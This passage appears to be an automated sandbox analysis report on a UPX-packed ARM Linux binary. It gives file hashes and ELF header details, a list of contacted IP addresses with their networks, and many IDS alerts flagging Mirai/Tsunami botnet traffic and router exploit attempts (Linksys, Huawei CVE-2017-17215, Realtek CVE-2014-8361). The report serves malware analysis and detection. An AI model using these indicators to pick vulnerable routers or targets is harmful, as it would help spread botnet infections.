              11351TWC-11351-NORTHEASTUSfalse
              95.195.139.153
              unknownSweden
              3301TELIANET-SWEDENTeliaCompanySEfalse
              172.99.210.153
              unknownReserved
              395799SVBUSfalse
              197.86.54.147
              unknownSouth Africa
              10474OPTINETZAfalse
              85.188.64.232
              unknownSweden
              35445JKP-SEfalse
              172.229.225.222
              unknownUnited States
              16625AKAMAI-ASUSfalse
              37.147.10.185
              unknownRussian Federation
              8402CORBINA-ASOJSCVimpelcomRUfalse
              197.185.6.12
              unknownSouth Africa
              37105NEOLOGY-ASZAfalse
              85.246.119.66
              unknownPortugal
              3243MEO-RESIDENCIALPTfalse
              172.3.178.81
              unknownUnited States
              7018ATT-INTERNET4USfalse
              98.53.239.36
              unknownUnited States
              7922COMCAST-7922USfalse
              62.74.130.74
              unknownGreece
              12361PANAFONET-ASAthensGreeceGRfalse
              62.31.100.57
              unknownUnited Kingdom
              5089NTLGBfalse
              197.143.201.76
              unknownAlgeria
              36891ICOSNET-ASDZfalse
              98.153.107.49
              unknownUnited States
              20001TWC-20001-PACWESTUSfalse
              184.250.68.89
              unknownUnited States
              10507SPCSUSfalse
              184.150.128.217
              unknownCanada
              577BACOMCAfalse
              172.229.225.217
              unknownUnited States
              16625AKAMAI-ASUSfalse
              94.124.54.5
              unknownItaly
              47986PRJINF-ASITfalse
              94.39.13.3
              unknownItaly
              8612TISCALI-ITfalse
              85.225.228.58
              unknownSweden
              2119TELENOR-NEXTELTelenorNorgeASNOfalse
              118.94.183.235
              unknownIndia
              9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
              172.44.154.205
              unknownUnited States
              21928T-MOBILE-AS21928USfalse
              85.173.96.248
              unknownRussian Federation
              43132KBT-ASBranchformerKabbalktelecomRUfalse
              31.142.125.244
              unknownTurkey
              16135TURKCELL-ASTurkcellASTRfalse
              98.10.234.39
              unknownUnited States
              11351TWC-11351-NORTHEASTUSfalse
              98.98.91.107
              unknownUnited States
              7018ATT-INTERNET4USfalse
              98.72.203.158
              unknownUnited States
              7018ATT-INTERNET4USfalse
              95.82.243.198
              unknownRussian Federation
              12668MIRALOGIC-ASRUfalse
              94.76.139.158
              unknownSpain
              29119SERVIHOSTING-ASAireNetworksESfalse
              172.48.225.102
              unknownUnited States
              21928T-MOBILE-AS21928USfalse
              156.197.234.63
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              172.126.245.202
              unknownUnited States
              7018ATT-INTERNET4USfalse
              172.195.251.41
              unknownAustralia
              18747IFX18747USfalse
              197.50.56.102
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              2.181.161.140
              unknownIran (ISLAMIC Republic Of)
              58224TCIIRfalse
              118.123.57.166
              unknownChina
              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              98.137.186.238
              unknownUnited States
              36647YAHOO-GQ1USfalse
              98.16.59.133
              unknownUnited States
              7029WINDSTREAMUSfalse
              94.78.205.79
              unknownRussian Federation
              12389ROSTELECOM-ASRUfalse
              184.9.231.55
              unknownUnited States
              7011FRONTIER-AND-CITIZENSUSfalse
              178.137.157.52
              unknownUkraine
              15895KSNET-ASUAfalse
              184.184.230.139
              unknownUnited States
              22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              62.83.246.199
              unknownSpain
              12430VODAFONE_ESESfalse
              98.26.162.47
              unknownUnited States
              11426TWC-11426-CAROLINASUSfalse
              98.37.89.113
              unknownUnited States
              7922COMCAST-7922USfalse
              184.188.248.219
              unknownUnited States
              22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, stripped
              Entropy (8bit):7.9582958851671375
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:pjT3uuMrF1
              File size:35008
              MD5:e8511d7655b6bb7a2e95a8a71945c87f
              SHA1:0d946d9f597a16bead0e8df270902105fe3662af
              SHA256:156bf5a274c0b19bb4941117a16e7c9be568d70c811199086145df079be80b36
              SHA512:67d8aabd546118f7a8fca53668606bedc7f21f35a106d3c3ee630801747a3755bfc27b065883d0a22b1f549b2c20f26ef348572fb8f24c296e14a78738716251
              SSDEEP:768:Pn9PmZnrFuKv/IT3/a6NoCbbz4Dmg09NqI56lETUS8u9q3UEL3:tiHl6NGD3GNPiETUhTL3
              TLSH:C3F2F2E09746BC7742300EBBE7450D8A27ECCB74D0DAB6171622990CBEEA490DA7524B
              File Content Preview:.ELF..............(.........4...........4. ...(.....................u...u................Z...Z...Z..................Q.td...............................OUPX!.........S...S......^..........?.E.h;....#..$..........:W..'.x.....F..O..]m...`..c..g....>.(...P.K.

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:ARM
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - Linux
              ABI Version:0
              Entry Point Address:0xf588
              Flags:0x4000002
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:0
              Section Header Size:40
              Number of Section Headers:0
              Header String Table Index:0
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80000x80000x87750x87753.99060x5R E0x8000
              LOAD0x5a900x25a900x25a900x00x00.00000x6RW 0x8000
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.23172.255.83.10051174555552027153 05/14/22-02:19:57.628001TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5117455555192.168.2.23172.255.83.100
              192.168.2.2395.143.204.23852402802027121 05/14/22-02:19:59.979425TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5240280192.168.2.2395.143.204.238
              192.168.2.2395.136.115.7450126802027121 05/14/22-02:21:11.764865TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5012680192.168.2.2395.136.115.74
              192.168.2.23197.246.194.22653566372152835222 05/14/22-02:21:39.028446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356637215192.168.2.23197.246.194.226
              192.168.2.23172.65.81.17953844555552027153 05/14/22-02:19:59.137951TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5384455555192.168.2.23172.65.81.179
              192.168.2.23156.234.231.22957116528692027339 05/14/22-02:20:29.429465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711652869192.168.2.23156.234.231.229
              192.168.2.23172.65.177.8248362555552027153 05/14/22-02:21:10.452251TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4836255555192.168.2.23172.65.177.82
              192.168.2.2395.142.64.15133610802027121 05/14/22-02:19:53.342712TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3361080192.168.2.2395.142.64.151
              192.168.2.2395.56.139.9459572802027121 05/14/22-02:21:32.727426TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5957280192.168.2.2395.56.139.94
              192.168.2.2395.211.103.15238686802027121 05/14/22-02:19:47.512944TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3868680192.168.2.2395.211.103.152
              192.168.2.2395.31.7.6547324802027121 05/14/22-02:20:02.461488TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4732480192.168.2.2395.31.7.65
              192.168.2.23172.65.238.12554388555552027153 05/14/22-02:20:08.992019TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5438855555192.168.2.23172.65.238.125
              192.168.2.2395.189.104.13841018802027121 05/14/22-02:20:32.218131TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4101880192.168.2.2395.189.104.138
              192.168.2.2395.61.121.20644906802027121 05/14/22-02:20:03.803878TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4490680192.168.2.2395.61.121.206
              192.168.2.2395.100.240.22653848802027121 05/14/22-02:21:23.038728TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5384880192.168.2.2395.100.240.226
              192.168.2.23172.65.187.12539084555552027153 05/14/22-02:20:37.047910TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3908455555192.168.2.23172.65.187.125
              192.168.2.2395.216.169.9635526802027121 05/14/22-02:20:28.438174TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3552680192.168.2.2395.216.169.96
              192.168.2.2395.9.211.13445804802027121 05/14/22-02:20:50.335116TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4580480192.168.2.2395.9.211.134
              192.168.2.2395.159.0.20360034802027121 05/14/22-02:20:28.556099TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6003480192.168.2.2395.159.0.203
              192.168.2.2395.159.7.3947180802027121 05/14/22-02:21:16.327351TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4718080192.168.2.2395.159.7.39
              192.168.2.2395.56.29.18036084802027121 05/14/22-02:20:48.149836TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3608480192.168.2.2395.56.29.180
              192.168.2.23172.65.109.12442672555552027153 05/14/22-02:21:06.678651TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4267255555192.168.2.23172.65.109.124
              192.168.2.23172.65.80.25057792555552027153 05/14/22-02:19:50.996196TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5779255555192.168.2.23172.65.80.250
              192.168.2.23172.65.203.18340090555552027153 05/14/22-02:19:57.645189TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4009055555192.168.2.23172.65.203.183
              192.168.2.23156.244.124.6254780528692027339 05/14/22-02:21:19.394819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5478052869192.168.2.23156.244.124.62
              192.168.2.2395.65.111.19238106802027121 05/14/22-02:20:56.002880TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3810680192.168.2.2395.65.111.192
              192.168.2.23156.250.91.13145570528692027339 05/14/22-02:20:29.395003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4557052869192.168.2.23156.250.91.131
              192.168.2.2395.159.33.21456926802027121 05/14/22-02:20:54.820107TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5692680192.168.2.2395.159.33.214
              192.168.2.23172.65.234.19437462555552027153 05/14/22-02:19:47.505957TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3746255555192.168.2.23172.65.234.194
              192.168.2.2398.159.33.19449528555552027153 05/14/22-02:20:13.406392TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4952855555192.168.2.2398.159.33.194
              192.168.2.2395.216.8.6260662802027121 05/14/22-02:20:26.047138TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6066280192.168.2.2395.216.8.62
              192.168.2.2395.100.60.11932814802027121 05/14/22-02:19:52.635703TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3281480192.168.2.2395.100.60.119
              192.168.2.2395.107.229.3633744802027121 05/14/22-02:21:14.075300TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3374480192.168.2.2395.107.229.36
              192.168.2.23172.65.4.7238672555552027153 05/14/22-02:20:18.663856TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3867255555192.168.2.23172.65.4.72
              192.168.2.2395.245.84.15734900802027121 05/14/22-02:20:23.687567TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3490080192.168.2.2395.245.84.157
              192.168.2.2395.101.164.5855826802027121 05/14/22-02:20:39.296946TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5582680192.168.2.2395.101.164.58
              192.168.2.2395.215.239.14640644802027121 05/14/22-02:21:03.782018TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4064480192.168.2.2395.215.239.146
              192.168.2.2395.179.202.20535652802027121 05/14/22-02:20:29.974289TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3565280192.168.2.2395.179.202.205
              192.168.2.2395.65.49.22848088802027121 05/14/22-02:20:28.494212TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4808880192.168.2.2395.65.49.228
              192.168.2.23172.65.155.7835938555552027153 05/14/22-02:20:03.389982TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3593855555192.168.2.23172.65.155.78
              192.168.2.23172.65.28.18837548555552027153 05/14/22-02:21:10.434822TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3754855555192.168.2.23172.65.28.188
              192.168.2.2395.56.217.14057738802027121 05/14/22-02:20:32.203958TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5773880192.168.2.2395.56.217.140
              192.168.2.2395.100.124.21940064802027121 05/14/22-02:21:03.799358TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4006480192.168.2.2395.100.124.219
              192.168.2.23112.135.200.3347048802027121 05/14/22-02:20:26.004599TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4704880192.168.2.23112.135.200.33
              192.168.2.2395.163.168.10943244802027121 05/14/22-02:20:50.298257TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4324480192.168.2.2395.163.168.109
              192.168.2.23172.65.254.2849556555552027153 05/14/22-02:20:53.942992TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4955655555192.168.2.23172.65.254.28
              192.168.2.23197.237.77.4548226372152835222 05/14/22-02:21:12.221258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822637215192.168.2.23197.237.77.45
              192.168.2.2395.28.223.12760158802027121 05/14/22-02:19:54.571832TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6015880192.168.2.2395.28.223.127
              192.168.2.23172.65.208.22147180555552027153 05/14/22-02:21:15.003517TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4718055555192.168.2.23172.65.208.221
              192.168.2.2395.141.209.23753648802027121 05/14/22-02:21:16.255320TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5364880192.168.2.2395.141.209.237
              192.168.2.2395.217.173.17642360802027121 05/14/22-02:19:59.979314TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4236080192.168.2.2395.217.173.176
              192.168.2.23172.65.254.19839484555552027153 05/14/22-02:19:49.942206TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3948455555192.168.2.23172.65.254.198
              192.168.2.2395.217.156.25245090802027121 05/14/22-02:20:55.948104TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4509080192.168.2.2395.217.156.252
              192.168.2.23172.65.100.2259092555552027153 05/14/22-02:20:55.145336TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5909255555192.168.2.23172.65.100.22
              192.168.2.23112.121.177.22134130802027121 05/14/22-02:20:44.359761TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3413080192.168.2.23112.121.177.221
              192.168.2.2395.159.51.2953666802027121 05/14/22-02:19:52.694475TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5366680192.168.2.2395.159.51.29
              192.168.2.23112.215.101.8160170802027121 05/14/22-02:20:38.895103TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6017080192.168.2.23112.215.101.81
              192.168.2.2395.101.22.16334682802027121 05/14/22-02:21:28.995999TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3468280192.168.2.2395.101.22.163
              192.168.2.2395.165.133.14534562802027121 05/14/22-02:20:37.016015TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3456280192.168.2.2395.165.133.145
              192.168.2.23172.65.220.15233210555552027153 05/14/22-02:19:47.522649TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3321055555192.168.2.23172.65.220.152
              192.168.2.23172.65.226.9456510555552027153 05/14/22-02:20:26.128722TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5651055555192.168.2.23172.65.226.94
              192.168.2.23172.65.98.6846890555552027153 05/14/22-02:20:51.595727TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4689055555192.168.2.23172.65.98.68
              192.168.2.2398.159.224.1937196555552027153 05/14/22-02:21:10.525505TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3719655555192.168.2.2398.159.224.19
              192.168.2.2395.217.100.9050666802027121 05/14/22-02:20:07.909211TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5066680192.168.2.2395.217.100.90
              192.168.2.2395.173.188.1753452802027121 05/14/22-02:21:16.301756TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5345280192.168.2.2395.173.188.17
              192.168.2.2395.163.40.13056302802027121 05/14/22-02:20:17.767623TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5630280192.168.2.2395.163.40.130
              192.168.2.2395.205.61.15945412802027121 05/14/22-02:21:23.140530TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4541280192.168.2.2395.205.61.159
              192.168.2.2395.217.152.9160996802027121 05/14/22-02:21:29.005358TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6099680192.168.2.2395.217.152.91
              192.168.2.23112.106.58.15039318802027121 05/14/22-02:20:02.405864TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3931880192.168.2.23112.106.58.150
              192.168.2.23112.179.60.10652164802027121 05/14/22-02:19:47.485907TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5216480192.168.2.23112.179.60.106
              192.168.2.2395.216.14.21637572802027121 05/14/22-02:20:40.548225TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3757280192.168.2.2395.216.14.216
              192.168.2.23172.65.70.15634830555552027153 05/14/22-02:21:29.853316TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3483055555192.168.2.23172.65.70.156
              192.168.2.23156.241.119.16751336528692027339 05/14/22-02:21:38.199643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133652869192.168.2.23156.241.119.167
              192.168.2.2395.56.234.11157896802027121 05/14/22-02:20:26.254878TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5789680192.168.2.2395.56.234.111
              192.168.2.2395.233.22.20254454802027121 05/14/22-02:19:59.937809TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5445480192.168.2.2395.233.22.202
              192.168.2.2395.111.244.25339608802027121 05/14/22-02:20:58.081431TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3960880192.168.2.2395.111.244.253
              192.168.2.2395.140.156.4346396802027121 05/14/22-02:20:48.022368TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4639680192.168.2.2395.140.156.43
              192.168.2.2395.101.242.10450832802027121 05/14/22-02:19:54.491456TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5083280192.168.2.2395.101.242.104
              192.168.2.23172.97.132.13055154555552027153 05/14/22-02:19:45.321580TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5515455555192.168.2.23172.97.132.130
              192.168.2.2395.161.182.236966802027121 05/14/22-02:20:39.165687TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3696680192.168.2.2395.161.182.2
              192.168.2.2395.56.223.15134538802027121 05/14/22-02:20:15.032748TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3453880192.168.2.2395.56.223.151
              192.168.2.2395.57.74.3350396802027121 05/14/22-02:19:54.640711TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5039680192.168.2.2395.57.74.33
              192.168.2.2395.217.215.8660962802027121 05/14/22-02:20:20.205596TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6096280192.168.2.2395.217.215.86
              192.168.2.23172.65.5.4944762555552027153 05/14/22-02:20:15.566625TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4476255555192.168.2.23172.65.5.49
              192.168.2.2395.217.121.5748134802027121 05/14/22-02:20:47.995507TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4813480192.168.2.2395.217.121.57
              192.168.2.23172.65.146.5845536555552027153 05/14/22-02:20:53.942910TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4553655555192.168.2.23172.65.146.58
              192.168.2.2395.159.55.16432974802027121 05/14/22-02:20:28.550766TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3297480192.168.2.2395.159.55.164
              192.168.2.23172.65.152.19558680555552027153 05/14/22-02:21:15.003655TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5868055555192.168.2.23172.65.152.195
              192.168.2.2395.101.50.2936210802027121 05/14/22-02:20:58.196781TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3621080192.168.2.2395.101.50.29
              192.168.2.23172.245.84.20155974555552027153 05/14/22-02:20:21.837542TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5597455555192.168.2.23172.245.84.201
              192.168.2.2395.211.3.4758028802027121 05/14/22-02:21:11.754876TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5802880192.168.2.2395.211.3.47
              192.168.2.23172.65.46.16736878555552027153 05/14/22-02:20:26.128840TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3687855555192.168.2.23172.65.46.167
              192.168.2.2395.61.121.20644884802027121 05/14/22-02:20:02.452312TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4488480192.168.2.2395.61.121.206
              192.168.2.2395.100.32.13358682802027121 05/14/22-02:20:12.238521TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5868280192.168.2.2395.100.32.133
              192.168.2.23112.79.32.4242658802027121 05/14/22-02:20:23.608445TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4265880192.168.2.23112.79.32.42
              192.168.2.2395.100.123.20540996802027121 05/14/22-02:21:00.525492TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4099680192.168.2.2395.100.123.205
              192.168.2.23172.65.255.11347180555552027153 05/14/22-02:19:54.382118TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4718055555192.168.2.23172.65.255.113
              192.168.2.2395.214.235.12633216802027121 05/14/22-02:20:07.909063TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3321680192.168.2.2395.214.235.126
              192.168.2.23156.224.25.14240106528692027339 05/14/22-02:20:47.247262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4010652869192.168.2.23156.224.25.142
              192.168.2.2395.87.254.4357278802027121 05/14/22-02:19:53.372300TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5727880192.168.2.2395.87.254.43
              192.168.2.2395.131.149.11457714802027121 05/14/22-02:21:34.904086TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5771480192.168.2.2395.131.149.114
              192.168.2.2395.217.147.8037940802027121 05/14/22-02:20:37.002920TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3794080192.168.2.2395.217.147.80
              192.168.2.2395.101.85.8852956802027121 05/14/22-02:20:58.119066TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5295680192.168.2.2395.101.85.88
              192.168.2.23172.65.97.12843836555552027153 05/14/22-02:21:31.954750TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4383655555192.168.2.23172.65.97.128
              192.168.2.2395.143.229.4937410802027121 05/14/22-02:20:47.942900TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3741080192.168.2.2395.143.229.49
              192.168.2.23172.65.231.18936138555552027153 05/14/22-02:20:26.126595TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3613855555192.168.2.23172.65.231.189
              192.168.2.23172.245.77.5443396555552027153 05/14/22-02:19:50.861365TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4339655555192.168.2.23172.245.77.54
              192.168.2.2395.101.96.21634304802027121 05/14/22-02:21:00.513758TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3430480192.168.2.2395.101.96.216
              192.168.2.2395.215.170.3138548802027121 05/14/22-02:20:52.527746TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3854880192.168.2.2395.215.170.31
              192.168.2.2395.252.56.12541832802027121 05/14/22-02:21:34.895934TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4183280192.168.2.2395.252.56.125
              192.168.2.2395.58.75.10847170802027121 05/14/22-02:21:11.847346TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4717080192.168.2.2395.58.75.108
              192.168.2.2395.159.30.9250334802027121 05/14/22-02:21:25.371312TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5033480192.168.2.2395.159.30.92
              192.168.2.2395.131.136.6544472802027121 05/14/22-02:20:26.033464TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4447280192.168.2.2395.131.136.65
              192.168.2.2395.142.75.18149820802027121 05/14/22-02:20:55.954772TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4982080192.168.2.2395.142.75.181
              192.168.2.23156.241.13.9738248528692027339 05/14/22-02:19:49.315222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3824852869192.168.2.23156.241.13.97
              192.168.2.23172.65.227.11452622555552027153 05/14/22-02:21:06.661307TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5262255555192.168.2.23172.65.227.114
              192.168.2.23156.225.159.18250730528692027339 05/14/22-02:20:25.835892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5073052869192.168.2.23156.225.159.182
              192.168.2.2395.209.146.21050540802027121 05/14/22-02:20:38.689489TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5054080192.168.2.2395.209.146.210
              192.168.2.23172.65.163.13350650555552027153 05/14/22-02:20:39.493185TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5065055555192.168.2.23172.65.163.133
              192.168.2.2395.213.40.556526802027121 05/14/22-02:20:28.445974TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5652680192.168.2.2395.213.40.5
              192.168.2.2395.180.165.20354376802027121 05/14/22-02:20:29.989309TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5437680192.168.2.2395.180.165.203
              192.168.2.2395.166.120.7254750802027121 05/14/22-02:21:23.057590TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5475080192.168.2.2395.166.120.72
              192.168.2.23172.255.80.660084555552027153 05/14/22-02:20:08.975191TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6008455555192.168.2.23172.255.80.6
              192.168.2.2395.101.238.3342720802027121 05/14/22-02:20:17.717017TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4272080192.168.2.2395.101.238.33
              192.168.2.2395.179.156.2557406802027121 05/14/22-02:20:02.429434TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5740680192.168.2.2395.179.156.25
              192.168.2.2395.101.210.22652942802027121 05/14/22-02:20:35.416113TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5294280192.168.2.2395.101.210.226
              192.168.2.23112.169.202.10050322802027121 05/14/22-02:21:05.146467TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5032280192.168.2.23112.169.202.100
              192.168.2.2395.213.201.6045874802027121 05/14/22-02:19:52.681868TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4587480192.168.2.2395.213.201.60
              192.168.2.23172.255.83.9140446555552027153 05/14/22-02:21:07.857174TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4044655555192.168.2.23172.255.83.91
              192.168.2.2395.170.196.18440608802027121 05/14/22-02:20:29.987583TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4060880192.168.2.2395.170.196.184
              192.168.2.2395.159.50.8551920802027121 05/14/22-02:20:46.769425TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5192080192.168.2.2395.159.50.85
              192.168.2.23172.65.60.10237828555552027153 05/14/22-02:20:51.595839TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3782855555192.168.2.23172.65.60.102
              192.168.2.23172.245.250.14248988555552027153 05/14/22-02:20:55.340538TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4898855555192.168.2.23172.245.250.142
